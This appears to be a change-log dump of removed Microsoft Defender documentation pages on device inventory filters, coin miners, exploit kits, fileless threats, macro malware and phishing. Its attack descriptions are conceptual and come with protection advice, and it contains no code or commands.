-**Criticality level** | The criticality level reflects how critical a device is for your organization. The possible levels are low, medium, high, or very high. Very high means that the device is considered a business critical asset. For more information, see [Overview of critical asset management](/security-exposure-management/critical-asset-management).
-**OS Platform** | Filter by the OS platforms you're interested in investigating </br></br>(_Computers and mobile and IoT devices only_).
-**Windows version** | Filter by the Windows versions you're interested in investigating. If 'future version' appears in the Windows version field, it can mean:</br></br> - This is a pre-release build for a future Windows release</br> - The build has no version name</br> - The build version name isn't yet supported </br></br> In all these scenarios, where available, the full OS version can be seen in the device details page.</br></br> (_Computers and mobile only_).
-**Sensor health state** | Filter by the following sensor health states, for devices onboard to Microsoft Defender for Endpoint:</br> - **Active**: Devices that are actively reporting sensor data to the service.</br> - **Inactive**: Devices that stopped sending signals for more than seven days.</br> - **Misconfigured**: Devices that have impaired communications with service or are unable to send sensor data.</br> Misconfigured devices can further be classified to: </br> - No sensor data </br> - Impaired communications </br> For more information on how to address issues on misconfigured devices, see, [Fix unhealthy sensors](/microsoft-365/security/defender-endpoint/fix-unhealthy-sensors).</br></br> (_Computers and mobile only_).
-**Onboarding status** | Onboarding status indicates whether the device is currently onboarded to Microsoft Defender for Endpoint or not. Device discovery must be enabled for this filter to appear. You can filter by the following states: </br> - **Onboarded**: The endpoint is onboarded to Microsoft Defender for Endpoint.</br> - **Can be onboarded**: The endpoint was discovered in the network as a supported device, but isn't currently onboarded. Microsoft highly recommends onboarding these devices.</br> - **Unsupported**: The endpoint was discovered in the network, but isn't supported by Microsoft Defender for Endpoint.</br> - **Insufficient info**: The system couldn't determine the supportability of the device.</br></br> (_Computers and mobile only_).
-**Antivirus status** | Filter the view based on whether the antivirus status is disabled, not updated or unknown.</br></br> (_Computers and mobile only_).
-**First seen** | Filter your view based on when the device was first seen in the network or when it was first reported by the Microsoft Defender for Endpoint sensor.</br></br>(_Computers and mobile and IoT devices only_).
-**Tags** | Filter the list based on the grouping and tagging that you've added to individual devices. See [Create and manage device tags](machine-tags.md).
-**Internet facing** | Filter the list based on whether the device is internet facing.
-**Group** | Filter the list based on the group you're interested in investigating.</br></br> (_Computers and mobile only_).
-**Device value** | Filter the list based on whether the device is marked as high value or low value.
-**Exclusion state** | Filter the list based on whether the device is excluded or not. For more information, see [Exclude devices](exclude-devices.md).
-**Managed by** | Managed by indicates how the device is being managed. You can filter by:</br> - Microsoft Defender for Endpoint</br> - Microsoft Intune, including co-management with Microsoft Configuration Manager via tenant attach</br>- Microsoft Configuration manager (ConfigMgr)</br> - Unknown: This issue could be due the running an outdated Windows version, GPO management, or another non-Microsoft MDM.</br></br> (_Computers and mobile only_)
-**Device Type** | Filter by the device type you're interested in investigating.</br></br> (_IoT devices only_)
-**Mitigation status** | Filter by isolation or containment status of a device.
-
-## Use columns to customize the device inventory views
-
-You can add or remove columns from the view and sort the entries by clicking on an available column header.
-
-On the **Computer and Mobiles** tab, select **Customize columns** to see the columns available. The default values are checked in the following image:
--
-On the **Network devices** tab, select **Customize columns** to see the columns available. The default values are checked in the following image:
--
-On the **IoT devices** tab, select **Customize columns** to see the columns available. The default values are checked in the following image:
--
-## Related articles
-
-[Investigate devices in the Microsoft Defender for Endpoint Devices list](investigate-machines.md).
-
security Coinminer Malware https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/malware/coinminer-malware.md
- Title: Coin miners-
-description: Learn about coin miners, how they can infect devices, and what you can do to protect yourself.
-keywords: security, malware, coin miners, protection, cryptocurrencies
------- m365-security-- tier2- Previously updated : 03/18/2022--
-# Coin miners
-
-Cybercriminals are always looking for new ways to make money. With the rise of digital currencies, also known as cryptocurrencies, criminals see a unique opportunity to infiltrate an organization and secretly mine for coins by reconfiguring malware.
-
-## How coin miners work
-
-Many infections start with:
--- Email messages with attachments that try to install malware.--- Websites hosting exploit kits that attempt to use vulnerabilities in web browsers and other software to install coin miners.--- Websites taking advantage of computer processing power by running scripts while users browse the website.-
-Mining is the process of running complex mathematical calculations necessary to maintain the blockchain ledger. This process generates coins but requires significant computing resources.
-
-Coin miners aren't inherently malicious. Some individuals and organizations invest in hardware and electric power for legitimate coin mining operations. However, others look for alternative sources of computing power and try to find their way into corporate networks. These coin miners aren't wanted in enterprise environments because they eat up precious computing resources.
-
-Cybercriminals see an opportunity to make money by running malware campaigns that distribute, install, and run trojanized miners at the expense of other people's computing resources.
-
-### Examples
-
-DDE exploits, which have been known to distribute ransomware, are now delivering miners.
-
-For example, a sample of the malware detected as Trojan:Win32/Coinminer (SHA-256: 7213cbbb1a634d780f9bb861418eb262f58954e6e5dca09ca50c1e1324451293) is installed by Exploit:O97M/DDEDownloader.PA, a Word document that contains the DDE exploit.
-
-The exploit launches a cmdlet that executes a malicious PowerShell script (Trojan:PowerShell/Maponeir.A). It downloads the trojanized miner, a modified version of the miner XMRig, which then mines Monero cryptocurrency.
-
-## How to protect against coin miners
-
-**Enable potentially unwanted applications (PUA) detection**. Some coin mining tools aren't considered malware but are detected as PUA. Many applications detected as PUA can negatively impact machine performance and employee productivity. In enterprise environments, you can stop adware, torrent downloaders, and coin mining by enabling PUA detection.
-
-Since coin miners are becoming a popular payload in many different kinds of attacks, see general tips on how to [prevent malware infection](prevent-malware-infection.md).
-
-For more information on coin miners, see the blog post [Invisible resource thieves: The increasing threat of cryptocurrency miners](https://cloudblogs.microsoft.com/microsoftsecure/2018/03/13/invisible-resource-thieves-the-increasing-threat-of-cryptocurrency-miners/).
security Exploits Malware https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/malware/exploits-malware.md
- Title: Exploits and exploit kits-
-description: Learn about how exploits use vulnerabilities in common software to give attackers access to your computer and install other malware.
-keywords: security, malware, exploits, exploit kits, prevention, vulnerabilities, Microsoft, Exploit malware family, exploits, java, flash, adobe, update software, prevent exploits, exploit pack, vulnerability, 0-day, holes, weaknesses, attack, Flash, Adobe, out-of-date software, out of date software, update, update software, reinfection, Java cache, reinfected, won't remove, won't clean, still detects, full scan, MSE, Defender, WDSI, MMPC, Microsoft Malware Protection Center
------- m365-security-- tier2- Previously updated : 03/18/2022--
-# Exploits and exploit kits
-
-Exploits take advantage of vulnerabilities in software. A vulnerability is like a hole in your software that malware can use to get onto your device. Malware exploits these vulnerabilities to bypass your computer's security safeguards to infect your device.
-
-## How exploits and exploit kits work
-
-Exploits are often the first part of a larger attack. Hackers scan for outdated systems that contain critical vulnerabilities, which they then exploit by deploying targeted malware. Exploits often include shellcode, which is a small malware payload used to download additional malware from attacker-controlled networks. Shellcode allows hackers to infect devices and infiltrate organizations.
-
-Exploit kits are more comprehensive tools that contain a collection of exploits. These kits scan devices for different kinds of software vulnerabilities and, if any are detected, deploy additional malware to further infect a device. Kits can use exploits targeting various software, including Adobe Flash Player, Adobe Reader, Internet Explorer, Oracle Java, and Sun Java.
-
-The most common method used by attackers to distribute exploits and exploit kits is through webpages, but exploits can also arrive in emails. Some websites unknowingly and unwillingly host malicious code and exploits in their ads.
-
-The infographic below shows how an exploit kit might attempt to exploit a device after you visit a compromised webpage.
-
-![example of how exploit kits work.](../../../media/security-intelligence-images/exploit-kit.png)
-
-*Figure 1. Example of how to exploit kits work*
-
-Several notable threats, including Wannacry, exploit the Server Message Block (SMB) vulnerability CVE-2017-0144 to launch malware.
-
-Examples of exploit kits:
--- Angler / [Axpergle](https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=JS/Axpergle)--- [Neutrino](https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=JS/NeutrinoEK)--- [Nuclear](https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=JS/Neclu)-
-To learn more about exploits, read this blog post on [taking apart a double zero-day sample discovered in joint hunt with ESET.](https://cloudblogs.microsoft.com/microsoftsecure/2018/07/02/taking-apart-a-double-zero-day-sample-discovered-in-joint-hunt-with-eset/)
-
-## How we name exploits
-
-We categorize exploits in our Malware encyclopedia by the "platform" they target. For example, Exploit:Java/CVE-2013-1489.A is an exploit that targets a vulnerability in Java.
-
-A project called "Common Vulnerabilities and Exposures (CVE)" is used by many security software vendors. The project gives each vulnerability a unique number, for example, CVE-2016-0778.
-The portion "2016" refers to the year the vulnerability was discovered. The "0778" is a unique ID for this specific vulnerability.
-
-You can read more on the [CVE website](https://cve.mitre.org/).
-
-## How to protect against exploits
-
-The best prevention for exploits is to keep your organization's [software up to date](https://portal.msrc.microsoft.com/). Software vendors provide updates for many known vulnerabilities, so make sure these updates are applied to all devices.
-
-For more general tips, see [prevent malware infection](prevent-malware-infection.md).
security Fileless Threats https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/malware/fileless-threats.md
- Title: Fileless threats-
-description: Learn about the categories of fileless threats and malware that live off the land
-keywords: fileless, fileless malware, living off the land, lolbins, amsi, behavior monitoring, memory scanning, boot sector protection, security, malware, Windows Defender ATP, antivirus, AV, Microsoft Defender ATP, next-generation protection
------- m365-security-- tier2- Previously updated : 03/18/2022--
-# Fileless threats
-
-What exactly are fileless threats? The term "fileless" suggests that a threat doesn't come in a file, such as a backdoor that lives only in the memory of a machine. However, there's no one definition for fileless malware. The term is used broadly, and sometimes to describe malware families that do rely on files to operate.
-
-Attacks involve [several stages](https://attack.mitre.org/wiki/ATT&CK_Matrix) for functionalities like execution, persistence, or information theft. Some parts of the attack chain may be fileless, while others may involve the file system in some form.
-
-For clarity, fileless threats are grouped into different categories.
-
-![Comprehensive diagram of fileless malware.](../../../media/security-intelligence-images/fileless-malware.png)<br>
-*Figure 1. Comprehensive diagram of fileless malware*
-
-Fileless threats can be classified by their entry point, which indicates how fileless malware can arrive on a machine. They can arrive via an exploit, through compromised hardware, or via regular execution of applications and scripts.
-
-Next, list the form of entry point. For example, exploits can be based on files or network data, PCI peripherals are a type of hardware vector, and scripts and executables are subcategories of the execution vector.
-
-Finally, classify the host of the infection. For example, a Flash application may contain a variety of threats such as an exploit, a simple executable, and malicious firmware from a hardware device.
-
-Classifying helps you divide and categorize the various kinds of fileless threats. Some are more dangerous but also more difficult to implement, while others are more commonly used despite (or precisely because of) not being very advanced.
-
-From this categorization, you can glean three main types of fileless threats based on how much fingerprint they may leave on infected machines.
-
-## Type I: No file activity performed
-
-A fully fileless malware can be considered one that never requires writing a file on the disk. How would such malware infect a machine in the first place? One example is where a target machine receives malicious network packets that exploit the EternalBlue vulnerability. The vulnerability allows the installation of the DoublePulsar backdoor, which ends up residing only in the kernel memory. In this case, there's no file or any data written on a file.
-
-A compromised device may also have malicious code hiding in device firmware (such as a BIOS), a USB peripheral (like the BadUSB attack), or in the firmware of a network card. All these examples don't require a file on the disk to run, and can theoretically live only in memory. The malicious code would survive reboots, disk reformats, and OS reinstalls.
-
-Infections of this type can be particularly difficult to detect because most antivirus products don't have the capability to inspect firmware. In cases where a product does have the ability to inspect and detect malicious firmware, there are still significant challenges associated with remediation of threats at this level. This type of fileless malware requires high levels of sophistication and often depends on particular hardware or software configuration. It's not an attack vector that can be exploited easily and reliably. While dangerous, threats of this type are uncommon and not practical for most attacks.
-
-## Type II: Indirect file activity
-
-There are other ways that malware can achieve fileless presence on a machine without requiring significant engineering effort. Fileless malware of this type doesn't directly write files on the file system, but they can end up using files indirectly. For example, with the [Poshspy backdoor](https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html) attackers installed a malicious PowerShell command within the WMI repository and configured a WMI filter to run the command periodically.
-
-It's possible to carry out such installation via command line without requiring a backdoor to already be on the file. The malware can be installed and theoretically run without ever touching the file system. However, the WMI repository is stored on a physical file in a central storage area managed by the CIM Object Manager, and usually contains legitimate data. Even though the infection chain does technically use a physical file, it's considered a fileless attack because the WMI repository is a multi-purpose data container that can't be detected and removed.
-
-## Type III: Files required to operate
-
-Some malware can have a sort of fileless persistence, but not without using files to operate. An example for this scenario is Kovter, which creates a shell open verb handler in the registry for a random file extension. Opening a file with such extension will lead to the execution of a script through the legitimate tool mshta.exe.
-
-![Image of Kovter's registry key.](../../../media/security-intelligence-images/kovter-reg-key.png)<br>
-*Figure 2. Kovter's registry key*
-
-When the open verb is invoked, the associated command from the registry is launched, which results in the execution of a small script. This script reads data from a further registry key and executes it, in turn leading to the loading of the final payload. However, to trigger the open verb in the first place, Kovter has to drop a file with the same extension targeted by the verb (in the example above, the extension is .bbf5590fd). It also has to set an autorun key configured to open such file when the machine starts.
-
-Kovter is considered a fileless threat because the file system is of no practical use. The files with random extensions contain junk data that isn't usable in verifying the presence of the threat. The files that store the registry are containers that can't be detected and deleted if malicious content is present.
-
-## Categorizing fileless threats by infection host
-
-Having described the broad categories, we can now dig into the details and provide a breakdown of the infection hosts. This comprehensive classification covers the panorama of what is usually referred to as fileless malware. It drives our efforts to research and develop new protection features that neutralize classes of attacks and ensure malware doesn't get the upper hand in the arms race.
-
-### Exploits
-
-**File-based** (Type III: executable, Flash, Java, documents): An initial file may exploit the operating system, the browser, the Java engine, the Flash engine, etc. to execute a shellcode and deliver a payload in memory. While the payload is fileless, the initial entry vector is a file.
-
-**Network-based** (Type I): A network communication that takes advantage of a vulnerability in the target machine can achieve code execution in the context of an application or the kernel. An example is WannaCry, which exploits a previously fixed vulnerability in the SMB protocol to deliver a backdoor within the kernel memory.
-
-### Hardware
-
-**Device-based** (Type I: network card, hard disk): Devices like hard disks and network cards require chipsets and dedicated software to function. Software residing and running in the chipset of a device is called firmware. Although a complex task, the firmware can be infected by malware.
-
-**CPU-based** (Type I): Modern CPUs are complex and may include subsystems running firmware for management purposes. Such firmware may be vulnerable to hijacking and allow the execution of malicious code that would operate from within the CPU. In December 2017, two researchers reported a vulnerability that can allow attackers to execute code inside the [Management Engine (ME)](https://en.wikipedia.org/wiki/Intel_Management_Engine) present in any modern CPU from Intel. Meanwhile, the attacker group PLATINUM has been observed to have the capability to use Intel's [Active Management Technology (AMT)](https://en.wikipedia.org/wiki/Intel_Active_Management_Technology) to perform [invisible network communications](https://cloudblogs.microsoft.com/microsoftsecure/2017/06/07/platinum-continues-to-evolve-find-ways-to-maintain-invisibility/), bypassing the installed operating system. ME and AMT are essentially autonomous micro-computers that live inside the CPU and that operate at a very low level. Because these technologies' purpose is to provide remote manageability, they have direct access to hardware, are independent of the operating system, and can run even if the computer is turned off.
-
-Besides being vulnerable at the firmware level, CPUs could be manufactured with backdoors inserted directly in the hardware circuitry. This attack has been researched and proved possible in the past. It has been reported that certain models of x86 processors contain a secondary embedded RISC-like CPU core that can [effectively provide a backdoor](https://www.theregister.co.uk/2018/08/10/via_c3_x86_processor_backdoor/) through which regular applications can gain privileged execution.
-
-**USB-based** (Type I): USB devices of all kinds can be reprogrammed with malicious firmware capable of interacting with the operating system in nefarious ways. For example, the [BadUSB technique](https://arstechnica.com/information-technology/2014/07/this-thumbdrive-hacks-computers-badusb-exploit-makes-devices-turn-evil/) allows a reprogrammed USB stick to act as a keyboard that sends commands to machines via keystrokes, or as a network card that can redirect traffic at will.
-
-**BIOS-based** (Type I): A BIOS is a firmware running inside a chipset. It executes when a machine is powered on, initializes the hardware, and then transfers control to the boot sector. The BIOS is an important component that operates at a low level and executes before the boot sector. It's possible to reprogram the BIOS firmware with malicious code, as has happened in the past with the [Mebromi rootkit](https://www.webroot.com/blog/2011/09/13/mebromi-the-first-bios-rootkit-in-the-wild/).
-
-**Hypervisor-based** (Type I): Modern CPUs provide hardware hypervisor support, allowing the operating system to create robust virtual machines. A virtual machine runs in a confined, simulated environment, and is in theory unaware of the emulation. A malware taking over a machine may implement a small hypervisor to hide itself outside of the realm of the running operating system. Malware of this kind has been theorized in the past, and eventually real hypervisor rootkits [have been observed](http://seclists.org/fulldisclosure/2017/Jun/29), although few are known to date.
-
-### Execution and injection
-
-**File-based** (Type III: executables, DLLs, LNK files, scheduled tasks): This is the standard execution vector. A simple executable can be launched as a first-stage malware to run an additional payload in memory, or injected into other legitimate running processes.
-
-**Macro-based** (Type III: Office documents): The [VBA language](/office/vba/Library-Reference/Concepts/getting-started-with-vba-in-office) is a flexible and powerful tool designed to automate editing tasks and add dynamic functionality to documents. As such, it can be abused by attackers to carry out malicious operations like decoding, running, or injecting an executable payload, or even implementing an entire ransomware, like in [the case of qkG](https://blog.trendmicro.com/trendlabs-security-intelligence/qkg-filecoder-self-replicating-document-encrypting-ransomware/). Macros are executed within the context of an Office process (e.g., Winword.exe) and implemented in a scripting language. There's no binary executable that an antivirus can inspect. While Office apps require explicit consent from the user to execute macros from a document, attackers use social engineering techniques to trick users into allowing macros to execute.
-
-**Script-based** (Type II: file, service, registry, WMI repo, shell): The JavaScript, VBScript, and PowerShell scripting languages are available by default on Windows platforms. Scripts have the same advantages as macros, they are textual files (not binary executables) and run within the context of the interpreter (like wscript.exe, powershell.exe), which is a clean and legitimate component. Scripts are versatile and can be run from a file (by double-clicking them) or executed directly on the command line of an interpreter. Running on the command line allows malware to encode malicious scripts as autostart services inside [autorun registry keys](https://www.gdatasoftware.com/blog/2014/07/23947-poweliks-the-persistent-malware-without-a-file) as [WMI event subscriptions](https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html) from the WMI repo. Furthermore, an attacker who has gained access to an infected machine may input the script on the command prompt.
-
-**Disk-based** (Type II: Boot Record): The Boot Record is the first sector of a disk or volume, and contains executable code required to start the boot process of the operating system. Threats like [Petya](https://cloudblogs.microsoft.com/microsoftsecure/2017/06/27/new-ransomware-old-techniques-petya-adds-worm-capabilities/?source=mmpc) are capable of infecting the Boot Record by overwriting it with malicious code. When the machine is booted, the malware immediately gains control. The Boot Record resides outside the file system, but it's accessible by the operating system. Modern antivirus products have the capability to scan and restore it.
-
-## Defeating fileless malware
-
-At Microsoft, we actively monitor the security landscape to identify new threat trends and develop solutions to mitigate classes of threats. We instrument durable protections that are effective against a wide range of threats. Through AntiMalware Scan Interface (AMSI), behavior monitoring, memory scanning, and boot sector protection, [Microsoft Defender for Endpoint](/microsoft-365/security/defender-endpoint/microsoft-defender-endpoint) can inspect fileless threats even with heavy obfuscation. Machine learning technologies in the cloud allow us to scale these protections against new and emerging threats.
-
-To learn more, read: [Out of sight but not invisible: Defeating fileless malware with behavior monitoring, AMSI, and next-gen AV](https://cloudblogs.microsoft.com/microsoftsecure/2018/09/27/out-of-sight-but-not-invisible-defeating-fileless-malware-with-behavior-monitoring-amsi-and-next-gen-av/)
-
-## Additional resources and information
-
-Learn how to [deploy threat protection capabilities across Microsoft 365 E5](/microsoft-365/solutions/deploy-threat-protection).
security Macro Malware https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/malware/macro-malware.md
- Title: Macro malware-
-description: Learn about macro viruses and malware, which are embedded in documents and are used to drop malicious payloads and distribute other threats.
-keywords: security, malware, macro, protection, WDSI, MMPC, Microsoft Malware Protection Center, macro virus, macro malware, documents, viruses in Office, viruses in Word
------- m365-security-- tier2- Previously updated : 03/18/2022--
-# Macro malware
-
-Macros are a powerful way to automate common tasks in Microsoft Office and can make people more productive. However, macro malware uses this functionality to infect your device.
-
-## How macro malware works
-
-Macro malware hides in Microsoft Office files and is delivered as email attachments or inside ZIP files. These files use names that are intended to entice or scare people into opening them. They often look like invoices, receipts, legal documents, and more.
-
-Macro malware was fairly common several years ago because macros ran automatically whenever a document was opened. In recent versions of Microsoft Office, macros are disabled by default. Now, malware authors need to convince users to turn on macros so that their malware can run. They try to scare users by showing fake warnings when a malicious document is opened.
-
-We've seen macro malware download threats from the following families:
-
-* [Ransom:MSIL/Swappa](https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:MSIL/Swappa.A)
-* [Ransom:Win32/Teerac](https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/Teerac&threatId=-2147277789)
-* [TrojanDownloader:Win32/Chanitor](https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Win32/Chanitor.A)
-* [TrojanSpy:Win32/Ursnif](https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif)
-* [Win32/Fynloski](https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Win32/Fynloski)
-* [Worm:Win32/Gamarue](https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Win32/Gamarue)
-
-## How to protect against macro malware
-
-* Make sure macros are disabled in your Microsoft Office applications. In enterprises, IT admins set the default setting for macros:
- * [Enable or disable macros](https://support.office.com/article/Enable-or-disable-macros-in-Office-documents-7b4fdd2e-174f-47e2-9611-9efe4f860b12) in Office documents
-
-* Don't open suspicious emails or suspicious attachments.
-
-* Delete any emails from unknown people or with suspicious content. Spam emails are the main way macro malware spreads.
-
-* Enterprises can prevent macro malware from running executable content using [ASR rules](/microsoft-365/security/defender-endpoint/attack-surface-reduction)
-
-For more tips on protecting yourself from suspicious emails, see [phishing](phishing.md).
-
-For more general tips, see [prevent malware infection](prevent-malware-infection.md).
security Phishing Trends https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/malware/phishing-trends.md
- Title: Phishing trends and techniques-
-description: Learn about how to spot phishing techniques
-keywords: security, malware, phishing, information, scam, social engineering, bait, lure, protection, trends, targeted attack, spear phishing, whaling
------- m365-security-- tier2- Previously updated : 03/18/2022--
-# Phishing trends and techniques
-
-Phishing attacks are scams that often use social engineering bait or lure content. Legitimate-looking communication, usually email, that links to a phishing site is one of the most common methods used in phishing attacks. The phishing site typically mimics sign in pages that require users to input credentials and account information. The phishing site then captures the sensitive information as soon as the user provides it, giving attackers access to the information.
-
-Below are some of the most common phishing techniques attackers will employ to try to steal information or gain access to your devices.
-
-## Invoice phishing
-
-In this scam, the attacker attempts to lure you with an email stating that you have an outstanding invoice from a known vendor or company. They then provide a link for you to access and pay your invoice. When you access the site, the attacker is poised to steal your personal information and funds.
-
-## Payment/delivery scam
-
-You're asked to provide a credit card or other personal information so that your payment information can be updated with a commonly known vendor or supplier. The update is requested so that you can take delivery of your ordered goods. Generally, you may be familiar with the company and have likely done business with them in the past. However, you aren't aware of any items you have recently purchased from them.
-
-## Tax-themed phishing scams
-
-A common IRS phishing scam is receiving an urgent email letter indicating that you owe money to the IRS. Often the email threatens legal action if you don't access the site in a timely manner and pay your taxes. When you access the site, the attackers can steal your personal credit card or bank information and drain your accounts.
-
-## Downloads
-
-An attacker sends a fraudulent email requesting you to open or download a document attachment, such as a PDF. The attachment often contains a message asking you to sign in to another site, such as email or file sharing websites, to open the document. When you access these phishing sites using your sign-in credentials, the attacker now has access to your information and can gain additional personal information about you.
-
-## Phishing emails that deliver other threats
-
-Phishing emails are often effective, so attackers sometimes use them to distribute [ransomware](/security/compass/human-operated-ransomware) through links or attachments in emails. When run, the ransomware encrypts files and displays a ransom note, which asks you to pay a sum of money to access to your files.
-
-We have also seen phishing emails that have links to [tech support scam](support-scams.md) websites. These websites use various scare tactics to trick you into calling hotlines and paying for unnecessary "technical support services" that supposedly fix contrived device, platform, or software problems.
-
-## Spear phishing
-
-Spear phishing is a targeted phishing attack that involves highly customized lure content. Attackers will typically do reconnaissance work by surveying social media and other information sources about their intended target.
-
-Spear phishing may involve tricking you into logging into fake sites and divulging credentials. I may also lure you into opening documents by clicking on links that automatically install malware. With this malware in place, attackers can remotely manipulate the infected computer.
-
-The implanted malware serves as the point of entry for a more sophisticated attack, known as an advanced persistent threat (APT). APTs are designed to establish control and steal data over extended periods. Attackers may try to deploy more covert hacking tools, move laterally to other computers, compromise or create privileged accounts, and regularly exfiltrate information from compromised networks.
-
-## Whaling
-
-Whaling is a form of phishing directed at high-level or senior executives within specific companies to gain access to their credentials and/or bank information. The content of the email may be written as a legal subpoena, customer complaint, or other executive issue. This type of attack can also lead to an APT attack within an organization.
-
-## Business email compromise
-
-Business email compromise (BEC) is a sophisticated scam that targets businesses who frequently work with foreign suppliers or do money wire transfers. One of the most common schemes used by BEC attackers involves gaining access to a company's network through a spear phishing attack. The attacker creates a domain similar to the company they're targeting, or spoofs their email to scam users into releasing personal account information for money transfers.
-
-## More information about phishing attacks
-
-For information on the latest phishing attacks, techniques, and trends, you can read these entries on the [Microsoft Security blog](https://www.microsoft.com/security/blog/):
--- [Phishers unleash simple but effective social engineering techniques using PDF attachments](https://cloudblogs.microsoft.com/microsoftsecure/2017/01/26/phishers-unleash-simple-but-effective-social-engineering-techniques-using-pdf-attachments/?source=mmpc)-- [Tax themed phishing and malware attacks proliferate during the tax filing season](https://cloudblogs.microsoft.com/microsoftsecure/2017/03/20/tax-themed-phishing-and-malware-attacks-proliferate-during-the-tax-filing-season/?source=mmpc)-- [Phishing like emails lead to tech support scam](https://cloudblogs.microsoft.com/microsoftsecure/2017/08/07/links-in-phishing-like-emails-lead-to-tech-support-scam/?source=mmpc)
security Phishing https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/malware/phishing.md
- Title: How to protect against phishing attacks-
-description: Learn about how phishing work, deliver malware do your devices, and what you can do to protect yourself.
-keywords: security, malware, phishing, information, scam, social engineering, bait, lure, protection, trends, targeted attack
------- m365-security-- tier2- Previously updated : 03/18/2022--
-# How to protect against phishing attacks
-
-Phishing attacks attempt to steal sensitive information through emails, websites, text messages, or other forms of electronic communication. They try to look like official communication from legitimate companies or individuals.
-
-Cybercriminals often attempt to steal usernames, passwords, credit card details, bank account information, or other credentials. They use stolen information for malicious purposes, such as hacking, identity theft, or stealing money directly from bank accounts and credit cards. The information can also be sold in cybercriminal underground markets.
-
-Social engineering attacks are designed to take advantage of a user's possible lapse in decision-making. Be aware and never provide sensitive or personal information through email or unknown websites, or over the phone. Remember, phishing emails are designed to appear legitimate.
-
-## Learn the signs of a phishing scam
-
-The best protection is awareness and education. Don't open attachments or links in unsolicited emails, even if the emails came from a recognized source. If the email is unexpected, be wary about opening the attachment and verify the URL.
-
-Enterprises should educate and train their employees to be wary of any communication that requests personal or financial information. They should also instruct employees to report the threat to the company's security operations team immediately.
-
-Here are several telltale signs of a phishing scam:
--- The links or URLs provided in emails are **not pointing to the correct location** or are pointing to a third-party site not affiliated with the sender of the email. For example, in the image below the URL provided doesn't match the URL that you'll be taken to.-
- ![example of hovering over a url.](../../../media/security-intelligence-images/url-hover.png)
--- There's a **request for personal information** such as social security numbers or bank or financial information. Official communications won't generally request personal information from you in the form of an email.--- **Items in the email address will be changed** so that it's similar enough to a legitimate email address, but has added numbers or changed letters.--- The message is **unexpected and unsolicited**. If you suddenly receive an email from an entity or a person you rarely deal with, consider this email suspect.--- The message or the attachment asks you to **enable macros, adjust security settings, or install applications**. Normal emails won't ask you to do this.--- The message contains **errors**. Legitimate corporate messages are less likely to have typographic or grammatical errors or contain wrong information.--- The **sender address doesn't match the signature** on the message itself. For example, an email is purported to be from Mary of Contoso Corp, but the sender address is john<span></span>@example.com.--- There are **multiple recipients** in the "To" field and they appear to be random addresses. Corporate messages are normally sent directly to individual recipients.--- The greeting on the message itself **doesn't personally address you**. Apart from messages that mistakenly address a different person, greetings that misuse your name or pull your name directly from your email address tend to be malicious.--- The website looks familiar but there are **inconsistencies or things that aren't quite right**. Warning signs include outdated logos, typos, or ask users to give additional information that isn't asked by legitimate sign-in websites.--- The page that opens is **not a live page**, but rather an image that is designed to look like the site you're familiar with. A pop-up might appear that requests credentials.-
-If in doubt, contact the business by known channels to verify if any suspicious emails are in fact legitimate.
-
-## Software solutions for organizations
--- [Microsoft Edge](/microsoft-edge/deploy/index) and [Windows Defender Application Guard](/windows/security/threat-protection/microsoft-defender-application-guard/md-app-guard-overview) offer protection from the increasing threat of targeted attacks using Microsoft's industry-leading Hyper-V virtualization technology. If a browsed website is deemed untrusted, the Hyper-V container isolates that device from the rest of your network which will prevent access to your enterprise data.--- [Microsoft Exchange Online Protection (EOP)](https://products.office.com/exchange/exchange-email-security-spam-protection) offers enterprise-class reliability and protection against spam and malware, while maintaining access to email during and after emergencies. Using various layers of filtering, EOP can provide different controls for spam filtering, such as bulk mail controls and international spam, that improves your protection.--- Use [Microsoft Defender for Office 365](https://products.office.com/exchange/online-email-threat-protection?ocid=cx-blog-mmpc) to help protect your email, files, and online storage against malware. It offers holistic protection in Microsoft Teams, Word, Excel, PowerPoint, Visio, SharePoint Online, and OneDrive for Business. By protecting against unsafe attachments and expanding protection against malicious links, it complements the security features of Exchange Online Protection to provide better zero-day protection.-
-## What to do if you've been a victim of a phishing scam
-
-If you think you've been a victim of a phishing attack:
-
-1. Contact your IT admin if you are on a work computer
-2. Immediately change all passwords associated with the accounts
-3. Report any fraudulent activity to your bank and credit card company
-
-### Reporting spam
--- **Outlook.com**: If you receive a suspicious email message that asks for personal information, select the check box next to the message in your Outlook inbox. Select the arrow next to **Junk**, and then select **Phishing**.--- **Microsoft Office Outlook**: While in the suspicious message, select **Report message** from the ribbon, and then select **Phishing**.--- **Microsoft 365**: Use the [Submissions portal in Microsoft 365 Defender](/microsoft-365/security/office-365-security//submissions-admin) to submit the junk or phishing sample to Microsoft for analysis. For more information, see [How do I report a suspicious email or file to Microsoft?](/microsoft-365/security/office-365-security/submissions-report-messages-files-to-microsoft).--- **Anti-Phishing Working Group**: phishing-report@us-cert.gov. The group uses reports generated from emails sent to fight phishing scams and hackers. ISPs, security vendors, financial institutions, and law enforcement agencies are involved.-
-### If you're on a suspicious website
--- **Microsoft Edge**: While you're on a suspicious site, select the **More (...) icon** > **Help and feedback** > **Report Unsafe site**. Follow the instructions on the webpage that displays to report the website.--- **Internet Explorer**: While you're on a suspicious site, select the gear icon, point to **Safety**, and then select **Report Unsafe Website**. Follow the instructions on the webpage that displays to report the website.-
-## More information about phishing attacks
